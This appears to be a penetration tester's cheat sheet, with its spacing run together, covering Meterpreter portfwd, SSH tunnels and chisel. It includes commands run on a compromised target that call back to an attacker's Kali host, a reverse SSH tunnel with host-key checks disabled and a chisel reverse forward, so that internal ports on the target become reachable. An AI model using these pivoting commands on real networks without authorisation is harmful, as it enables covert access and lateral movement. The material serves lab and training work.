portfwdlistportfwd [add |delete]-lLOCAL_PORT-pTARGET_PORT-rTARGET_IPportfwdflush# to remove all port-forwarding
ssh port forwarding:
-f: background shell, to give shell back
-N: only setup connect, no commands are to be run
Forward connections (outgoing)
# for connecting to remote port via localhost (-L) (outgoing)ssh-LKALI-IP:KALI-PORT:localhost:TARGET-PORTTARGET-USER@TARGET-IP
Reverse connections (incoming)
authorized_keys file
from="IP",command="echo 'This account can only be used for Port Forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty <SSH-PUBLIC-key>
Command
# for allowing a connecting to your port from outside (incoming)ssh-fN-o"UserKnownHostsFile=/dev/null"-o"StrictHostKeyChecking=no"-RKALI-IP:KALI-PORT:localhost:TARGET-PORT-i<id_rsa>KALI-USER@KALI-IP# -N: not running commands# -f: go to background# UserKnownHostsFile=/dev/null & StrictHostKeyChecking=no will not ask kali password; not safe to enter password on target.
chisel port forwarding
Remote Port Forward
# server on kalichiselserver-p8000--reverse# client on targetchiselclientKALI_IP:8000R:KALI_LISTENING_PORT:TARGET_IP:TARGET_PORT_FORWARD [-v]ex.chisel.execlient10.10.16.161:9000R:8989:127.0.0.1:8888# chisel server is 10.10.16.161:9000# any requests to kali:8989 ==> target:8888
Local Port Forward
# server on targetchiselserver-p8000# client on kalichiselclientTARGET_IP:8000KALI_PORT:TARGET_IP:TARGET_PORT [-v]